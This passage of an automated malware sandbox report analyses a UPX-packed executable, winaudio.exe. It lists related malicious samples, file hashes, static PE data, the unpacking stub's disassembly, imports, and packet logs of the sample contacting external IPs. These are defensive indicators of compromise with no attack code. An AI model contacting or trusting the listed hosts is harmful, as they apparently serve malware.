                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      egGgMixHNS.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      egGgMixHNS.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      5KYnVcv9cf.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      5KYnVcv9cf.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      pjjaluln.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      KMSPico 11.1.2.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Windows\Temp\5B7C84755D8041139A7AEBA6F4E5912F.dat

                      Download File
                      Process:C:\Users\user\Desktop\winaudio.exe
                      File Type:data
                      Category:modified
                      Size (bytes):111069
                      Entropy (8bit):7.7610376443952775
                      Encrypted:false
                      SSDEEP:1536:xqoUBsTWNw2r31a/vODkM8/6uUZ3/UE59INsjfOi:xqjsyD31auDkMhh/bfINsjR
                      MD5:1C262030963192BB9B4107B90AC53E67
                      SHA1:12C90CE15E21420E00B7D3B360269F9C52D1FDE9
                      SHA-256:4192C7662F3774EB9F500DFD80632BDD4075E8B595A213D254DA0522F86AA3B4
                      SHA-512:D33C9D630297EE6E2E7968FF111F21828A7B1972C6A65C594A6782C7938E39DE354C18B3914CA6C9C5AB127E8F44F917906311A50288431DC2B352FEFFFC6F30
                      Malicious:false
                      Reputation:low
                      Preview:.m......X.....~d ?c'5bR8o.a f|ZZ..................https22.ttf:.U{.g.#.Z...p...<,...6..N.......bk.2....I.2.....oSD....}DW.F.}...6D..9..d}).T.+.@.Ew...$k./...........'..rC"2.B.i.."_..w.D......U...g..k..c...x...tg''.\......=b..^q#./.`f.C Fe............,.U....."....tF`3.$0......U...g..k..c...x.....pO;.j2.^6d.......U...g..k..c...x..t........ts......T.+.@.Ew...$k./...3.|B.5.h.4....pK.R..G..m'.Z5.,....i...l...)M+.P87....z.FMV^.R..^q#./.`f.C Fe..........=.....J..]_f.Z.tF`3.$0..5.h.4.R..."q..Z...p...<,...6..N....."eJFS..)....{DI....)O=s..^q#./.`f.C Fe............l.*V.FC.]..}.E..Bj.i..+......oSD....}DW.F.y.s.L{...}..W..N%...F9..#.9....F~~..@.:..g...d..>......G.`..h...6NqQlzUbT.5.7.yp+d.UR..F%.g..Ol-.....z......f.X.....`f.C Fe..........]...Y...Z...p...<,...6..N.........,M4.Y.u(..W..T.+.@.Ew...$k./TY..i+L.a......T.+.@.Ew...$k./..x.=.>z..\..jJ".d8X....F~~..@.:..g.....~la..B[LG..=..lzUbT.5.7.yp+d.U...7...(.zD.......r.'.9....ppV...<q.=^_..F~~..@.:..g.....&.)k.a..

                      \Device\ConDrv

                      Download File
                      Process:C:\Users\user\Desktop\winaudio.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):20
                      Entropy (8bit):1.5
                      Encrypted:false
                      SSDEEP:3:q3:q3
                      MD5:EBB74F5809511F1A535283D293A34D94
                      SHA1:311E533BA417AD75D701C8A05D7BCDB6B278B3B2
                      SHA-256:81C25D30F3308AB3C92B769842845417633C3C6DCCE47E99ECCCD5B1552AC810
                      SHA-512:C62A9D2525C82162B29699393378746E56E5679D91460FB9D8A718856EB3FEC1B66AC73AF6A7C84DEB07F5D99E41BAD069015065F50C053CD64763EEB4BA2295
                      Malicious:false
                      Reputation:low
                      Preview:....................

                      Static File Info

                      General

                      File type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                      Entropy (8bit):7.878754349315624
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.66%
                      • UPX compressed Win32 Executable (30571/9) 0.30%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:winaudio.exe
                      File size:702512
                      MD5:d2367ad6988bb88f1b03cc7352f9696a
                      SHA1:a5e4f6ed449af51d5d44fb6300bf87549ecdaced
                      SHA256:0c0a0efd7f2e4a27ddf26e5549d164aa8dc7fd570a4bd41daf07891b2a0b59af
                      SHA512:8b93bbed355d727dc47a3cabdcda8285f20e367c0892245b018527eea2e98a5980af33ac4945ef9d162f3c5e31fbe114a89330cba48111fe325ed11f1ebe5393
                      SSDEEP:12288:LuwwW2lKQC3DHd4PqE1JCcChPDAY54rsP7cpsAnHb2OA/6uyMlEamc42Olmj92ov:Luw0KQKjdK71JRyUY54aAHb2F2O9BsmT
                      TLSH:C2E423B3462E6D37FF86C7BA5835B98B114A3A1014E34CE456B33C9A8F7A61A3D04573
                      File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......I..9...j...j...j...j...j...j...j...j...j...k...j...j...j...k...j.%.j...j6..k...j6..k...j6..k*..j...j...j...j...j...k...j...j...

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x556940
                      Entrypoint Section:UPX1
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x60F7FA6F [Wed Jul 21 10:43:59 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:c99fa9efa02184d67eba9e2c9bf7ef23

                      Entrypoint Preview

                      Instruction
                      pushad
                      mov esi, 004B1000h
                      lea edi, dword ptr [esi-000B0000h]
                      push edi
                      jmp 00007FC3A520592Dh
                      nop
                      mov al, byte ptr [esi]
                      inc esi
                      mov byte ptr [edi], al
                      inc edi
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      jc 00007FC3A520590Fh
                      mov eax, 00000001h
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      adc eax, eax
                      add ebx, ebx
                      jnc 00007FC3A520592Dh
                      jne 00007FC3A520594Ah
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      jc 00007FC3A5205941h
                      dec eax
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      adc eax, eax
                      jmp 00007FC3A52058F6h
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      adc ecx, ecx
                      jmp 00007FC3A5205974h
                      xor ecx, ecx
                      sub eax, 03h
                      jc 00007FC3A5205933h
                      shl eax, 08h
                      mov al, byte ptr [esi]
                      inc esi
                      xor eax, FFFFFFFFh
                      je 00007FC3A5205997h
                      sar eax, 1
                      mov ebp, eax
                      jmp 00007FC3A520592Dh
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      jc 00007FC3A52058EEh
                      inc ecx
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      jc 00007FC3A52058E0h
                      add ebx, ebx
                      jne 00007FC3A5205929h
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      adc ecx, ecx
                      add ebx, ebx
                      jnc 00007FC3A5205911h
                      jne 00007FC3A520592Bh
                      mov ebx, dword ptr [esi]
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      jnc 00007FC3A5205906h
                      add ecx, 02h
                      cmp ebp, FFFFFB00h
                      adc ecx, 02h
                      lea edx, dword ptr [edi+ebp]
                      cmp ebp, FFFFFFFCh
                      jbe 00007FC3A5205930h
                      mov al, byte ptr [edx]

                      Rich Headers

                      Programming Language:
                      • [C++] VS2015 UPD3.1 build 24215
                      • [ C ] VS2015 UPD3.1 build 24215
                      • [IMP] VS2008 SP1 build 30729
                      • [RES] VS2015 UPD3 build 24213
                      • [LNK] VS2015 UPD3.1 build 24215

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x15736c0x204.rsrc
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1570000x36c.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1575700x10.rsrc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x156b240x5cUPX1
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      UPX00x10000xb00000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      UPX10xb10000xa60000xa5c00False0.9808517156862745data7.8746525051929925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x1570000x10000x600False0.4225260416666667data3.5528119263738653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_VERSION0x15705c0x310dataChineseChina

                      Imports

                      DLLImport
                      ADVAPI32.dllRegCloseKey
                      IPHLPAPI.DLLGetAdaptersInfo
                      KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                      PSAPI.DLLGetModuleFileNameExA
                      USER32.dllwsprintfA
                      VERSION.dllVerQueryValueA
                      WININET.dllInternetCrackUrlA
                      WS2_32.dllWSASetLastError

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      ChineseChina

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 30, 2023 07:40:08.235490084 CET4970310100192.168.2.3103.224.212.220
                      Jan 30, 2023 07:40:08.404762983 CET1010049703103.224.212.220192.168.2.3
                      Jan 30, 2023 07:40:08.915880919 CET4970310100192.168.2.3103.224.212.220
                      Jan 30, 2023 07:40:09.085498095 CET1010049703103.224.212.220192.168.2.3
                      Jan 30, 2023 07:40:09.587779045 CET4970310100192.168.2.3103.224.212.220
                      Jan 30, 2023 07:40:09.757230997 CET1010049703103.224.212.220192.168.2.3
                      Jan 30, 2023 07:40:10.819458961 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:11.030670881 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:11.030863047 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:11.032207966 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:11.243486881 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:11.243551970 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:11.243596077 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:11.243634939 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:11.243707895 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:12.083256960 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.256526947 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.256773949 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.256911993 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.357774019 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.357901096 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.429919958 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431133032 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431159973 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431173086 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431191921 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431204081 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431221962 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431236982 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:12.431287050 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.431346893 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.431950092 CET4970680192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:12.604921103 CET8049706104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:13.276061058 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.447237968 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.447531939 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.447882891 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.552433014 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.552805901 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.618916035 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619106054 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619160891 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619210958 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619257927 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619288921 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.619306087 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619345903 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619352102 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.619383097 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.619402885 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.619431973 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.620448112 CET4970780192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:13.641254902 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:13.794161081 CET8049707104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:13.852669001 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:13.852730989 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:13.852931023 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:13.854280949 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:14.657166004 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.826412916 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.826530933 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.826695919 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.933873892 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.933985949 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.995671988 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996628046 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996685028 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996732950 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996772051 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.996778011 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996824980 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996825933 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.996862888 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996896982 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:14.996907949 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:14.996944904 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:15.014744043 CET4970880192.168.2.3104.193.90.80
                      Jan 30, 2023 07:40:15.183971882 CET8049708104.193.90.80192.168.2.3
                      Jan 30, 2023 07:40:15.895122051 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.064740896 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.064862013 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.064955950 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.168234110 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.168411970 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.234436035 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234508991 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234559059 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234606981 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234652996 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234709978 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.234709978 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.234754086 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234798908 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234833956 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.234858990 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.234903097 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.248508930 CET4970980192.168.2.3104.193.88.109
                      Jan 30, 2023 07:40:16.331585884 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:16.417831898 CET8049709104.193.88.109192.168.2.3
                      Jan 30, 2023 07:40:16.543731928 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:16.543795109 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:16.543855906 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:16.543899059 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:17.932452917 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.952512026 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.952749968 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.952861071 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.974618912 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.974710941 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.974766016 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.974817038 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.974925041 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.975811958 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.975881100 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.975922108 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.975928068 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.976001024 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.976362944 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:17.976448059 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.976551056 CET4971080192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:17.996968031 CET8049710185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:18.599903107 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.620012999 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.620187998 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.620254040 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.640103102 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.640527964 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.640578032 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.640623093 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.640710115 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.641262054 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.641310930 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.641345978 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.641408920 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.641410112 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.641803026 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.641937971 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.641971111 CET4971180192.168.2.3185.10.104.120
                      Jan 30, 2023 07:40:18.661873102 CET8049711185.10.104.120192.168.2.3
                      Jan 30, 2023 07:40:18.680522919 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:18.700345993 CET4971210100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:18.891633987 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:18.891663074 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:18.891912937 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:18.912528992 CET1010049712103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:18.912693977 CET4971210100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:18.912763119 CET4971210100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:19.124861956 CET1010049712103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:19.399028063 CET1010049712103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:19.399081945 CET1010049712103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:19.399254084 CET4971210100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:19.399255037 CET4971210100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:40:19.610352039 CET1010049712103.86.67.66192.168.2.3
                      Jan 30, 2023 07:40:19.768596888 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:19.938124895 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:19.938241959 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:19.938349962 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.040960073 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.041062117 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.107609987 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108556986 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108606100 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108654022 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108701944 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108735085 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.108747005 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108789921 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108794928 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.108825922 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.108859062 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.108887911 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.113101959 CET4971380192.168.2.3104.193.88.112
                      Jan 30, 2023 07:40:20.153841019 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.173578024 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.173705101 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.173821926 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.194041014 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.194947958 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.194997072 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.195044994 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.195080042 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.195677042 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.195725918 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.195772886 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.195785046 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.195844889 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.196531057 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.196578026 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.196624994 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.197108030 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.197372913 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.197419882 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.197451115 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.197468042 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.197532892 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.198234081 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.198282957 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.198353052 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.198386908 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.199171066 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.199248075 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.199248075 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.199358940 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.199417114 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.200057030 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.200134993 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.200200081 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.200206995 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.200939894 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.201014042 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.201014996 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.201091051 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.201152086 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.201765060 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.214958906 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.215022087 CET8049714185.10.104.115192.168.2.3
